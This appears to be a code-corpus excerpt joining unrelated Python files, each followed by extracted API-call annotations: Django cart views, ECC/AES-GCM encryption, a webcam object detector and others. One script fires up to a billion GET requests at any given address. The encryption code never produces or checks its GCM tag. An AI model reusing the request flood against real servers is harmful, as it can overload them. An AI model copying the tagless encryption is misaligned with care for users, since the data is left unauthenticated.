(['signature'], {}), '(signature)\n', (3046, 3057), False, 'from django.utils.encoding import force_bytes\n'), ((3340, 3363), 'django.http.HttpResponse', 'HttpResponse', (['"""success"""'], {}), "('success')\n", (3352, 3363), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, 
HttpResponseRedirect\n'), ((1619, 1719), 'django.core.mail.EmailMessage', 'EmailMessage', (['subject', 'content', 'settings.SERVER_EMAIL', "['<EMAIL>']"], {'headers': "{'Reply-To': email}"}), "(subject, content, settings.SERVER_EMAIL, ['<EMAIL>'], headers=\n {'Reply-To': email})\n", (1631, 1719), False, 'from django.core.mail import BadHeaderError, EmailMessage\n'), ((2279, 2322), 'requests.get', 'requests.get', (['"""https://api.github.com/meta"""'], {}), "('https://api.github.com/meta')\n", (2291, 2322), False, 'import requests\n'), ((1948, 1982), 'django.http.JsonResponse', 'JsonResponse', (["{'message': 'error'}"], {}), "({'message': 'error'})\n", (1960, 1982), False, 'from django.http import JsonResponse\n')] |
from django.shortcuts import render , get_object_or_404, redirect
from django.http import HttpResponse
from .models import About
from django.contrib import messages
from django.views.generic import ListView, DetailView
from django.utils import timezone
from .models import (
Item, Order, OrderItem
)
# Create your views here.
def home(request):
    """Render the landing page."""
    return render(request, '../templates/home.html', {'title': 'Home'})
def about(request):
    """Render the about page."""
    return render(request, '../templates/about.html', {'title': 'About'})
def milestone_17(request):
    """Render the Milestone 17 page."""
    return render(request, '../templates/milestone_17.html', {'title': 'Milestone 17'})
def forsale(request):
    """Render the for-sale listings page."""
    return render(request, '../templates/forsale.html', {'title': 'For Sale'})
class HomeView(ListView):
    # Storefront: lists all Item records via the generic ListView.
    model= Item
    template_name = "home.html"
class ProductView(DetailView):
    # Detail page for a single Item.
    model = Item
    template_name = "product.html"
def add_to_cart(request, pk):
    """Add one unit of the Item identified by *pk* to the user's open order.

    Creates the open Order on first use; when the item is already in the
    cart, its quantity is incremented. Always redirects back to the
    product detail page.
    """
    item = get_object_or_404(Item, pk=pk)
    order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
    order_qs = Order.objects.filter(user=request.user, ordered=False)
    if order_qs.exists():
        order = order_qs[0]
        if order.items.filter(item__pk=item.pk).exists():
            order_item.quantity += 1
            order_item.save()
            messages.info(request, "Added Quantity Item!")
            return redirect("home:product", pk=pk)
        else:
            order.items.add(order_item)
            messages.info(request, "ITem added to your cart")
            return redirect("home:product", pk=pk)
    else:
        ordered_date = timezone.now()
        # Bug fix: the original passed the undefined name `order_date` to
        # create(), raising NameError whenever a new order was needed; use
        # the `ordered_date` computed above.
        # NOTE(review): the keyword `order_date` mirrors the original call —
        # confirm it matches the actual Order model field name.
        order = Order.objects.create(user=request.user, order_date=ordered_date)
        order.items.add(order_item)
        messages.info(request, "items added to your cart")
        return redirect("home:product", pk=pk)
def remove_from_cart(request, pk):
    """Remove the Item identified by *pk* from the user's open order."""
    # Bug fix: the lookup used the misspelled keyword `px=pk`, which makes
    # get_object_or_404 fail on every call.
    item = get_object_or_404(Item, pk=pk)
    order_qs = Order.objects.filter(user=request.user, ordered=False)
    if order_qs.exists():
        order = order_qs[0]
        if order.items.filter(item__pk=item.pk).exists():
            order_item = OrderItem.objects.filter(item=item, user=request.user, ordered=False)[0]
            order_item.delete()
            messages.info(request, "Item \"" + order_item.item.item_name + "\"removed from your cart")
            # Bug fix: the redirect omitted pk, unlike every other redirect
            # to this route, which would break URL reversal.
            return redirect("home:product", pk=pk)
        else:
            messages.info(request, "this item not in your cart")
            return redirect("home:product", pk=pk)
    else:
        messages.info(request, "you do not have an order")
        return redirect("home:product", pk=pk)
| [
"django.shortcuts.render",
"django.shortcuts.get_object_or_404",
"django.contrib.messages.info",
"django.utils.timezone.now",
"django.shortcuts.redirect"
] | [((356, 416), 'django.shortcuts.render', 'render', (['request', '"""../templates/home.html"""', "{'title': 'Home'}"], {}), "(request, '../templates/home.html', {'title': 'Home'})\n", (362, 416), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((449, 511), 'django.shortcuts.render', 'render', (['request', '"""../templates/about.html"""', "{'title': 'About'}"], {}), "(request, '../templates/about.html', {'title': 'About'})\n", (455, 511), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((551, 627), 'django.shortcuts.render', 'render', (['request', '"""../templates/milestone_17.html"""', "{'title': 'Milestone 17'}"], {}), "(request, '../templates/milestone_17.html', {'title': 'Milestone 17'})\n", (557, 627), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((662, 729), 'django.shortcuts.render', 'render', (['request', '"""../templates/forsale.html"""', "{'title': 'For Sale'}"], {}), "(request, '../templates/forsale.html', {'title': 'For Sale'})\n", (668, 729), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((931, 961), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Item'], {'pk': 'pk'}), '(Item, pk=pk)\n', (948, 961), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((1905, 1935), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Item'], {'px': 'pk'}), '(Item, px=pk)\n', (1922, 1935), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((1628, 1642), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1640, 1642), False, 'from django.utils import timezone\n'), ((1763, 1813), 'django.contrib.messages.info', 'messages.info', (['request', '"""items added to your cart"""'], {}), "(request, 'items added to your cart')\n", (1776, 1813), False, 'from django.contrib import messages\n'), ((1828, 1859), 'django.shortcuts.redirect', 'redirect', 
(['"""home:product"""'], {'pk': 'pk'}), "('home:product', pk=pk)\n", (1836, 1859), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((2529, 2579), 'django.contrib.messages.info', 'messages.info', (['request', '"""you do not have an order"""'], {}), "(request, 'you do not have an order')\n", (2542, 2579), False, 'from django.contrib import messages\n'), ((2594, 2625), 'django.shortcuts.redirect', 'redirect', (['"""home:product"""'], {'pk': 'pk'}), "('home:product', pk=pk)\n", (2602, 2625), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((1332, 1378), 'django.contrib.messages.info', 'messages.info', (['request', '"""Added Quantity Item!"""'], {}), "(request, 'Added Quantity Item!')\n", (1345, 1378), False, 'from django.contrib import messages\n'), ((1398, 1429), 'django.shortcuts.redirect', 'redirect', (['"""home:product"""'], {'pk': 'pk'}), "('home:product', pk=pk)\n", (1406, 1429), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((1498, 1547), 'django.contrib.messages.info', 'messages.info', (['request', '"""ITem added to your cart"""'], {}), "(request, 'ITem added to your cart')\n", (1511, 1547), False, 'from django.contrib import messages\n'), ((1566, 1597), 'django.shortcuts.redirect', 'redirect', (['"""home:product"""'], {'pk': 'pk'}), "('home:product', pk=pk)\n", (1574, 1597), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((2252, 2344), 'django.contrib.messages.info', 'messages.info', (['request', '(\'Item "\' + order_item.item.item_name + \'"removed from your cart\')'], {}), '(request, \'Item "\' + order_item.item.item_name +\n \'"removed from your cart\')\n', (2265, 2344), False, 'from django.contrib import messages\n'), ((2358, 2382), 'django.shortcuts.redirect', 'redirect', (['"""home:product"""'], {}), "('home:product')\n", (2366, 2382), False, 'from django.shortcuts import render, get_object_or_404, redirect\n'), ((2409, 2461), 
'django.contrib.messages.info', 'messages.info', (['request', '"""this item not in your cart"""'], {}), "(request, 'this item not in your cart')\n", (2422, 2461), False, 'from django.contrib import messages\n'), ((2480, 2511), 'django.shortcuts.redirect', 'redirect', (['"""home:product"""'], {'pk': 'pk'}), "('home:product', pk=pk)\n", (2488, 2511), False, 'from django.shortcuts import render, get_object_or_404, redirect\n')] |
from __future__ import print_function
from expresso.libs.expresso_serial import ExpressoSerial
import sys
# Usage: <script> <serial-port> <device-number>
# Assigns a numeric device ID over serial, then reads it back to confirm.
port = sys.argv[1]
number = int(sys.argv[2])
print()
print('setting device ID')
print(' port = {0}'.format(port))
print(' number = {0}'.format(number))
print()
# checkId=False: the device may not yet carry the ID we are about to assign.
dev = ExpressoSerial(port,checkId=False)
dev.setDeviceId(number)
print('fetching device ID')
dev_id = dev.getDeviceId()
print(' device ID = {0}'.format(dev_id))
print()
| [
"expresso.libs.expresso_serial.ExpressoSerial"
] | [((281, 316), 'expresso.libs.expresso_serial.ExpressoSerial', 'ExpressoSerial', (['port'], {'checkId': '(False)'}), '(port, checkId=False)\n', (295, 316), False, 'from expresso.libs.expresso_serial import ExpressoSerial\n')] |
from Crypto.Cipher import AES
from Crypto.PublicKey import ECC
from Crypto.Math.Numbers import Integer
import os
import hashlib
def ecc_point_to_256_bit_key(point):
    """Derive a 256-bit AES key by SHA-256 hashing an EC point's coordinates.

    Hashes x then y incrementally, which is equivalent to hashing their
    concatenated byte representations.
    """
    digest = hashlib.sha256(point.x.to_bytes())
    digest.update(point.y.to_bytes())
    return digest.digest()
def ecc_encrypt(plain_text, ecc_public_key):
    """Encrypt *plain_text* for *ecc_public_key* with an ECIES-style scheme.

    An ephemeral P-256 key pair is generated; the ECDH shared point with the
    recipient's public key is hashed into a 256-bit AES key, and the data is
    encrypted with AES-GCM.

    Returns (cipher_text, ephemeral_public_key_PEM, nonce).

    SECURITY NOTE(review): the GCM authentication tag is never produced
    (no ``encrypt_and_digest``) or returned, so the matching decrypt cannot
    verify integrity — this forfeits GCM's authentication guarantee.
    Consider returning the tag and verifying it on decryption.
    """
    ecc_shared_key = ECC.generate(curve='P-256')
    # Shared secret = recipient public point * ephemeral private scalar.
    aes_key = ecc_point_to_256_bit_key(ecc_public_key.pointQ * ecc_shared_key.d)
    cipher = AES.new(aes_key, AES.MODE_GCM)
    nonce = cipher.nonce
    cipher_text = cipher.encrypt(plain_text)
    return cipher_text, ecc_shared_key.public_key().export_key(format='PEM'), nonce
def ecc_decrypt(cipher_text, ecc_private_key, shared_key, nonce):
    """Decrypt *cipher_text* produced by ``ecc_encrypt``.

    Rebuilds the AES key from the recipient's private scalar and the
    sender's ephemeral public key (PEM in *shared_key*), then decrypts
    with AES-GCM under the given *nonce*.

    SECURITY NOTE(review): no ``verify()`` call — the GCM tag is never
    checked, so tampered ciphertext decrypts silently to garbage.
    """
    ecc_shared_key = ECC.import_key(shared_key)
    # Shared secret = own private scalar * sender's ephemeral public point.
    aes_key = ecc_point_to_256_bit_key(ecc_private_key.d * ecc_shared_key.pointQ)
    cipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)
    plain_text = cipher.decrypt(cipher_text)
    return plain_text
# Smoke-test the encrypt/decrypt round trip, then persist the key pair.
ecc_private_key = ECC.generate(curve='P-256')
ecc_public_key = ecc_private_key.public_key()
data = b'kho6ngcogi'
cipher_text, shared, nonce = ecc_encrypt(data, ecc_public_key)
plain_text = ecc_decrypt(cipher_text, ecc_private_key, shared, nonce)
print(data == plain_text)
passphrase = '<PASSWORD>'
# The private key is written passphrase-protected; the public key in plain PEM.
with open('private.pem', 'wt') as key_file:
    key_file.write(ecc_private_key.export_key(format='PEM',
                                              protection='PBKDF2WithHMAC-SHA1AndAES128-CBC',
                                              passphrase=passphrase))
with open('public.pem', 'wt') as key_file:
    key_file.write(ecc_public_key.export_key(format='PEM'))
| [
"Crypto.PublicKey.ECC.generate",
"Crypto.Cipher.AES.new",
"Crypto.PublicKey.ECC.import_key"
] | [((985, 1012), 'Crypto.PublicKey.ECC.generate', 'ECC.generate', ([], {'curve': '"""P-256"""'}), "(curve='P-256')\n", (997, 1012), False, 'from Crypto.PublicKey import ECC\n'), ((338, 365), 'Crypto.PublicKey.ECC.generate', 'ECC.generate', ([], {'curve': '"""P-256"""'}), "(curve='P-256')\n", (350, 365), False, 'from Crypto.PublicKey import ECC\n'), ((460, 490), 'Crypto.Cipher.AES.new', 'AES.new', (['aes_key', 'AES.MODE_GCM'], {}), '(aes_key, AES.MODE_GCM)\n', (467, 490), False, 'from Crypto.Cipher import AES\n'), ((733, 759), 'Crypto.PublicKey.ECC.import_key', 'ECC.import_key', (['shared_key'], {}), '(shared_key)\n', (747, 759), False, 'from Crypto.PublicKey import ECC\n'), ((855, 898), 'Crypto.Cipher.AES.new', 'AES.new', (['aes_key', 'AES.MODE_GCM'], {'nonce': 'nonce'}), '(aes_key, AES.MODE_GCM, nonce=nonce)\n', (862, 898), False, 'from Crypto.Cipher import AES\n')] |
# Ad-hoc HTTP stress-test script. NOTE(review): `requests` is imported twice
# and the ioloop/requests mix is acknowledged broken by the author's own
# comments below — kept byte-identical, documented only.
from tornado import ioloop
import time
import requests
import sys
import requests
import re
s = time.time()
maxRequestCount = 1000000000
i = 0          # outstanding-request counter (decremented in handle_request)
c = 0          # total requests issued
# Takes destination ip as command line input
if len(sys.argv) > 1:
    if re.match("^http", sys.argv[1]):
        ip = sys.argv[1]
    else:
        ip = "http://" + sys.argv[1]
else:
    ip = "http://localhost:8070/"
    # ip = "http://localhost:8071/"
# Suppresses the error from printing
class DevNull:
    # NOTE(review): currently unused — the sys.stderr override below is
    # commented out.
    i = 0
    c = 0
    def write(self, msg):
        pass
# This part of code isn't working, check it out.
'''
for j in range(1, 20):
    i += 1
    c += 1
    print(c)
    handle_request()
'''
#sys.stderr = DevNull()
def handle_request():
    # Issues one synchronous GET and decrements the outstanding counter;
    # stops the tornado ioloop once it reaches zero.
    print("Processing ip = " + ip)
    res = requests.get(ip)
    global i
    i -= 1
    # Must be used when client count is increased.
    #time.sleep(0.2)
    if i == 0:
        ioloop.IOLoop.instance().stop()
#1000 client requests are processed in 4 seconds.
for j in range(maxRequestCount):
    i += 1
    c += 1
    #print(c)
    handle_request()
try:
    ioloop.IOLoop.instance().start()
except ConnectionRefusedError:
    #pass
    print("Interrupt occured, taking break for 2 seconds.")
    time.sleep(2)
# This loop isn't running, check it out !!
try:
    for q in range(j, 1000):
        i += 1
        c += 1
        #print(c)
        handle_request()
except ConnectionRefusedError:
    print("Over dude")
    pass
print("Time taken to process = " + str(time.time() - s)) | [
"re.match",
"time.sleep",
"requests.get",
"tornado.ioloop.IOLoop.instance",
"time.time"
] | [((97, 108), 'time.time', 'time.time', ([], {}), '()\n', (106, 108), False, 'import time\n'), ((226, 256), 're.match', 're.match', (['"""^http"""', 'sys.argv[1]'], {}), "('^http', sys.argv[1])\n", (234, 256), False, 'import re\n'), ((813, 829), 'requests.get', 'requests.get', (['ip'], {}), '(ip)\n', (825, 829), False, 'import requests\n'), ((1276, 1289), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (1286, 1289), False, 'import time\n'), ((1138, 1162), 'tornado.ioloop.IOLoop.instance', 'ioloop.IOLoop.instance', ([], {}), '()\n', (1160, 1162), False, 'from tornado import ioloop\n'), ((956, 980), 'tornado.ioloop.IOLoop.instance', 'ioloop.IOLoop.instance', ([], {}), '()\n', (978, 980), False, 'from tornado import ioloop\n'), ((1583, 1594), 'time.time', 'time.time', ([], {}), '()\n', (1592, 1594), False, 'import time\n')] |
# -*- coding: utf-8 -*-
# website: https://loovien.github.io
# author: luowen<<EMAIL>>
# time: 2018/9/29 21:41
# desc:
from typing import List
from pathlib import Path
import shutil
from json import dump
import logging
from datetime import datetime
logger = logging.getLogger(__name__)


def videos_export_json(data: List[dict] = None, output: str = None):
    """Serialise *data* to ``<output>/videos.json``.

    An existing ``videos.json`` is first rotated to a timestamped backup
    (``videos.json-%Y%m%d%H%M%S``) instead of being overwritten.

    :param data: list of video records to dump (``None`` writes JSON null).
    :param output: target directory, created if missing; defaults to
        ``"output"``.
    """
    if output is None:
        output = "output"
    download_dir = Path(output)
    if not download_dir.exists():
        # Bug fix: the mode was the decimal literal 644 (== 0o1204), which
        # creates a directory without owner execute permission, so the
        # subsequent file write fails on POSIX. Use octal 0o755.
        download_dir.mkdir(mode=0o755, parents=True)
    abs_file = download_dir.joinpath("videos.json")
    if abs_file.exists():
        stamp = datetime.now().strftime("%Y%m%d%H%M%S")
        shutil.move(abs_file, download_dir.joinpath("videos.json-{}".format(stamp)))
    with open(abs_file, mode="w", encoding="utf-8") as fd:
        dump(data, fd, indent=" ", ensure_ascii=False)
    logger.info("export all video to videos.json")
| [
"logging.getLogger",
"datetime.datetime.now",
"json.dump",
"pathlib.Path"
] | [((260, 287), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (277, 287), False, 'import logging\n'), ((427, 439), 'pathlib.Path', 'Path', (['output'], {}), '(output)\n', (431, 439), False, 'from pathlib import Path\n'), ((802, 849), 'json.dump', 'dump', (['data', 'fd'], {'indent': '""" """', 'ensure_ascii': '(False)'}), "(data, fd, indent=' ', ensure_ascii=False)\n", (806, 849), False, 'from json import dump\n'), ((692, 706), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (704, 706), False, 'from datetime import datetime\n')] |
import pytest
from eshop.order import Order
@pytest.fixture
def jan_order() -> Order:
    """Fresh, empty order for client Jan Nowak."""
    return Order(client_first_name="Jan", client_last_name="Nowak")
@pytest.fixture
def other_jan_order() -> Order:
    """Second, independent order with identical client data (for equality tests)."""
    return Order(client_first_name="Jan", client_last_name="Nowak")
def test_add_element(jan_order):
    """add_element() records product, quantity and price as a single element."""
    jan_order.add_element("Rower", quantity=1, price=3_500)
    assert len(jan_order.elements) == 1
    element = jan_order.elements[0]
    assert element.product == "Rower"
    assert element.quantity == 1
    assert element.price == 3_500
def test_empty_order_equality(jan_order, other_jan_order):
    """Orders with the same client data compare equal; differing clients do not."""
    ula_order = Order(client_first_name="Ula", client_last_name="Nowak")
    jan_kowalski_order = Order(client_first_name="Jan", client_last_name="Kowalski")
    assert jan_order == other_jan_order
    assert jan_order != 0  # comparison with a non-Order must not raise
    assert jan_order != ula_order
    assert jan_order != jan_kowalski_order
def test_order_with_different_number_of_elements_not_equals(jan_order, other_jan_order):
    """An order with an extra element is not equal to an empty one."""
    jan_order.add_element("Rower", quantity=1, price=3_500)
    assert jan_order != other_jan_order
def test_orders_with_different_elements_not_equals(jan_order, other_jan_order):
    """Orders holding different elements are not equal."""
    jan_order.add_element("Rower", quantity=1, price=3_500)
    other_jan_order.add_element("Opona", quantity=2, price=50)
    assert jan_order != other_jan_order
| [
"eshop.order.Order"
] | [((100, 156), 'eshop.order.Order', 'Order', ([], {'client_first_name': '"""Jan"""', 'client_last_name': '"""Nowak"""'}), "(client_first_name='Jan', client_last_name='Nowak')\n", (105, 156), False, 'from eshop.order import Order\n'), ((218, 274), 'eshop.order.Order', 'Order', ([], {'client_first_name': '"""Jan"""', 'client_last_name': '"""Nowak"""'}), "(client_first_name='Jan', client_last_name='Nowak')\n", (223, 274), False, 'from eshop.order import Order\n'), ((635, 691), 'eshop.order.Order', 'Order', ([], {'client_first_name': '"""Ula"""', 'client_last_name': '"""Nowak"""'}), "(client_first_name='Ula', client_last_name='Nowak')\n", (640, 691), False, 'from eshop.order import Order\n'), ((717, 776), 'eshop.order.Order', 'Order', ([], {'client_first_name': '"""Jan"""', 'client_last_name': '"""Kowalski"""'}), "(client_first_name='Jan', client_last_name='Kowalski')\n", (722, 776), False, 'from eshop.order import Order\n')] |
"""
Unit test use of Path
"""
from pathlib_plus.pathlib_plus import Path
from os.path import expandvars
import unittest
# Base of the throwaway test tree. NOTE(review): %temp% only expands to a real
# path on Windows; elsewhere expandvars leaves it untouched -- confirm intent.
test_base = Path(expandvars(r'%temp%'))
# Fake rFactor 2 install location created under test_base for each test run.
test_folder = Path(r'Program Files(x86)\Steam\steamapps\common\rFactor 2')
# Relative folders created under the fake rFactor 2 install by setUp().
DUMMY_FOLDERS = [
    r'Installed\Locations\3pa_bathurst_2014',
    r'Installed\Locations\60sHockenheim',
    r'Installed\Locations\70sWatkinsGlen',
    r'Installed\Locations\adelaide_street_circuit',
    r'Installed\Locations\barbagallo_v2.3',
    r'Installed\Locations\bathurst_2016_v3',
    r'Installed\Locations\phillip island',
    r'Installed\Vehicles\ac_427sc_1967',
    r'Installed\Vehicles\ac_cobra_1954_endurance',
    r'Installed\Vehicles\Brabham_1966',
    r'Installed\Vehicles\datsun bluebird',
    r'Installed\Vehicles\Ferrari_312_67',
    r'Installed\Vehicles\flat12_917k_1971',
    r'Installed\Vehicles\howston_diss_1974',
    r'Installed\Vehicles\howston_g4_1967_endurance',
    r'Installed\Vehicles\howston_g4_1968',
    r'Installed\Vehicles\howston_g6_1968',
    r'Installed\Vehicles\lola_t70_spyder',
    r'Installed\Vehicles\mak-corp_group_c',
    r'Installed\Vehicles\t70 mkiiib',
    r'Installed\Vehicles\toyotacelicagto_1986'
]
class Test_test_Path(unittest.TestCase):
    # Exercises the project's Path class (pathlib_plus) against a throwaway
    # directory tree built under test_base / test_folder.
    def setUp(self):
        # Build the dummy rFactor 2 tree before every test.
        self.rf2dir = test_base.joinpath(test_folder)
        self.content_store = self.rf2dir.joinpath('Userdata')\
            .joinpath('ContentStorage')
        self.installed = self.rf2dir.joinpath('Installed')
        self.test_mkdir()
        for f in DUMMY_FOLDERS:
            self.rf2dir.joinpath(f).mkdir(parents=True, exist_ok=True)
    def test_setup(self):
        # The deepest dummy folder must exist once setUp() has run.
        _tip = self.rf2dir.joinpath(DUMMY_FOLDERS[-1])
        assert _tip.exists()
        pass
    def test_tearDown(self):
        # Re-create the root so tearDown() has something to remove.
        self.test_mkdir()
    def test_mkdir(self):
        """
        for p in reversed(self.rf2dir.parents):
            print(p)
            #if not Path(p).exists():
            #    Path(p).mkdir()  # exist_ok=True)
        """
        # Creating the root twice must not raise (exist_ok=True).
        self.rf2dir.mkdir(parents=True, exist_ok=True)
        assert self.rf2dir.exists(), self.rf2dir
    def tearDown(self):
        """
        for f in DUMMY_FOLDERS:
            self.rf2dir.joinpath(f).rmdir()
        for f in DUMMY_FOLDERS:
            d = self.rf2dir.joinpath(Path(f).parent)
            if d.exists():
                d.rmdir()
        for f in DUMMY_FOLDERS:
            d = self.rf2dir.joinpath(Path(f).parent.parent)
            if d.exists():
                d.rmdir()
        """
        # rmdir_tree is a pathlib_plus extension -- presumably removes the
        # whole subtree; confirm against the Path implementation.
        self.rf2dir.rmdir_tree()
        # Now work down to test_base
        for p in test_folder.parents:
            # All except the . at the end
            if p != Path('.'):
                test_base.joinpath(p).rmdir()
    """
    def test_mkdir(self):
        _cs_locations = self.content_store.joinpath('Locations')
        _cs_vehicles = self.content_store.joinpath('Vehicles')
        try:
            self.content_store.mkdir(parents=False, exist_ok=True)
        except FileNotFoundError:
            raise FileNotFoundError
        except FileExistsError:
            raise FileExistsError
        except Exception as e:
            print(e)
            raise e
    """
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| [
"pathlib_plus.pathlib_plus.Path",
"os.path.expandvars",
"unittest.main"
] | [((175, 238), 'pathlib_plus.pathlib_plus.Path', 'Path', (['"""Program Files(x86)\\\\Steam\\\\steamapps\\\\common\\\\rFactor 2"""'], {}), "('Program Files(x86)\\\\Steam\\\\steamapps\\\\common\\\\rFactor 2')\n", (179, 238), False, 'from pathlib_plus.pathlib_plus import Path\n'), ((138, 158), 'os.path.expandvars', 'expandvars', (['"""%temp%"""'], {}), "('%temp%')\n", (148, 158), False, 'from os.path import expandvars\n'), ((3218, 3233), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3231, 3233), False, 'import unittest\n'), ((2670, 2679), 'pathlib_plus.pathlib_plus.Path', 'Path', (['"""."""'], {}), "('.')\n", (2674, 2679), False, 'from pathlib_plus.pathlib_plus import Path\n')] |
# Copyright (c) 2010 Google Inc. All rights reserved.
# Use of this source code is governed by a Apache-style license that can be
# found in the LICENSE file.
from google.appengine.ext import db
import base
class FeaturedGame(db.Model):
    # Datastore reference to the base.Game entity this featured entry points at.
    reference = db.ReferenceProperty(base.Game)
class PopularGame(db.Model):
    # Datastore reference to the base.Game entity this popular entry points at.
    reference = db.ReferenceProperty(base.Game)
| [
"google.appengine.ext.db.ReferenceProperty"
] | [((255, 286), 'google.appengine.ext.db.ReferenceProperty', 'db.ReferenceProperty', (['base.Game'], {}), '(base.Game)\n', (275, 286), False, 'from google.appengine.ext import db\n'), ((331, 362), 'google.appengine.ext.db.ReferenceProperty', 'db.ReferenceProperty', (['base.Game'], {}), '(base.Game)\n', (351, 362), False, 'from google.appengine.ext import db\n')] |
# Live object detection from the default webcam using OpenCV's DNN module
# with an SSD MobileNet v3 model trained on COCO. Press 'q' to quit.
import cv2
import numpy as np
# Minimum detection confidence: detections scoring below this are dropped.
thres = 0.45
# Overlap threshold for non-maximum suppression (lower merges more boxes).
nms_threshold = 0.2
#Default Camera Capture
cap = cv2.VideoCapture(0)
cap.set(3, 1280)  # property 3: frame width
cap.set(4, 720)  # property 4: frame height
cap.set(10, 150)  # property 10: brightness
##Importing the COCO dataset in a list
classNames= []
classFile = 'coco.names'
with open(classFile,'rt') as f:
    classNames = f.read().rstrip('\n').split('\n')
##Configuring both SSD model and weights (assigning)
configPath = 'ssd_mobilenet_v3_large_coco_2020_01_14.pbtxt'
weightsPath = 'frozen_inference_graph.pb'
##dnn-Inbuilt method of OpenCV
net = cv2.dnn_DetectionModel(weightsPath,configPath)
net.setInputSize(320, 320)
net.setInputScale(1.0 / 127.5)
net.setInputMean((127.5, 127.5, 127.5))
net.setInputSwapRB(True)
## using Detect method
while True:
    success, img = cap.read()
    classIds, confs, bbox = net.detect(img, confThreshold=thres)
    bbox = list(bbox)
    # Flatten confidences to a plain list of floats for NMSBoxes.
    confs = list(np.array(confs).reshape(1, -1)[0])
    confs = list(map(float, confs))
    indices = cv2.dnn.NMSBoxes(bbox, confs, thres, nms_threshold)
    for i in indices:
        # NOTE(review): assumes NMSBoxes yields nested indices ([[i], ...]);
        # newer OpenCV releases return a flat array where i[0] would fail --
        # confirm against the installed OpenCV version.
        i = i[0]
        box = bbox[i]
        x, y, w, h = box[0], box[1], box[2], box[3]
        cv2.rectangle(img, (x, y),(x+w, h+y), color=(0, 255, 0), thickness=2)
        cv2.putText(img,classNames[classIds[i][0]-1].upper(), (box[0]+10, box[1]+30),
                    cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 2)
    cv2.imshow("Output", img)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
cap.release()
cv2.destroyAllWindows()
"cv2.rectangle",
"cv2.imshow",
"numpy.array",
"cv2.dnn_DetectionModel",
"cv2.destroyAllWindows",
"cv2.VideoCapture",
"cv2.dnn.NMSBoxes",
"cv2.waitKey"
] | [((95, 114), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (111, 114), False, 'import cv2\n'), ((522, 569), 'cv2.dnn_DetectionModel', 'cv2.dnn_DetectionModel', (['weightsPath', 'configPath'], {}), '(weightsPath, configPath)\n', (544, 569), False, 'import cv2\n'), ((1444, 1467), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1465, 1467), False, 'import cv2\n'), ((948, 999), 'cv2.dnn.NMSBoxes', 'cv2.dnn.NMSBoxes', (['bbox', 'confs', 'thres', 'nms_threshold'], {}), '(bbox, confs, thres, nms_threshold)\n', (964, 999), False, 'import cv2\n'), ((1348, 1373), 'cv2.imshow', 'cv2.imshow', (['"""Output"""', 'img'], {}), "('Output', img)\n", (1358, 1373), False, 'import cv2\n'), ((1122, 1196), 'cv2.rectangle', 'cv2.rectangle', (['img', '(x, y)', '(x + w, h + y)'], {'color': '(0, 255, 0)', 'thickness': '(2)'}), '(img, (x, y), (x + w, h + y), color=(0, 255, 0), thickness=2)\n', (1135, 1196), False, 'import cv2\n'), ((1381, 1395), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (1392, 1395), False, 'import cv2\n'), ((862, 877), 'numpy.array', 'np.array', (['confs'], {}), '(confs)\n', (870, 877), True, 'import numpy as np\n')] |
# Author: @Corefinder
# Language: Python
# Copyrights: SoumyajitBasu
# Purpose: The purpose of the class ChromeDriver is to check for the respective environment and download the required
# chrome driver for the respective environment.
# Download the latest chromedriver object
import os
import requests
from flexibox.core.logger import Logger
from flexibox.core.utility import Utility
from flexibox.utility.os_type import OS_type
class Chromedriver(object):
    """Downloads and updates the chromedriver binary for the current platform.

    Configuration (driver name, API URL, latest-release URL, architecture) is
    read from the ``ChromeDriver`` section of the downloader config via
    :class:`Utility`.
    """

    # Maps an OS name (as reported by OS_type.os_name()) to the suffix used in
    # the chromedriver download URL. Previously this was two copy-pasted
    # if-branches for macos/linux that differed only in this suffix.
    _OS_EXTENSIONS = {'macos': '_mac', 'linux': '_linux'}

    def __init__(self):
        self.ut = Utility()
        self.ot = OS_type()
        self.log = Logger()

    def chromedriver_objects(self):
        """Read chromedriver settings from downloader_config.ini.

        :return: dict with keys ``driver_type``, ``api_url``,
                 ``latest_release`` and ``arch``.
        """
        config_parser = self.ut.config_reader()
        return {
            'driver_type': config_parser.get('ChromeDriver', 'name'),
            'api_url': config_parser.get('ChromeDriver', 'url'),
            'latest_release': config_parser.get('ChromeDriver', 'latest_browser_driver'),
            'arch': config_parser.get('ChromeDriver', 'arch_type'),
        }

    def url_builder(self, os_extension):
        """Build the download URL for the latest chromedriver release.

        :param os_extension: platform suffix, e.g. ``'_mac'`` or ``'_linux'``.
        :return: full URL of the zip archive to download.
        """
        data = self.chromedriver_objects()
        # The latest-release endpoint returns the version string as plain text.
        latest_release = requests.get(data['latest_release'])
        return (data['api_url'] + latest_release.text + '/' + data['driver_type']
                + os_extension + data['arch'] + '.zip')

    def evaluate_on_environment(self, os_name, arch_type):
        """Download and unpack the chromedriver binary for this platform.

        Only 64-bit macos/linux are supported; any other combination is a
        silent no-op (matching the original branch conditions).
        """
        os_extension = self._OS_EXTENSIONS.get(os_name)
        if os_extension is None or arch_type != '64':
            return
        dir_path = self.ut.get_driver_path("/dependencies/dir_chromedriver")
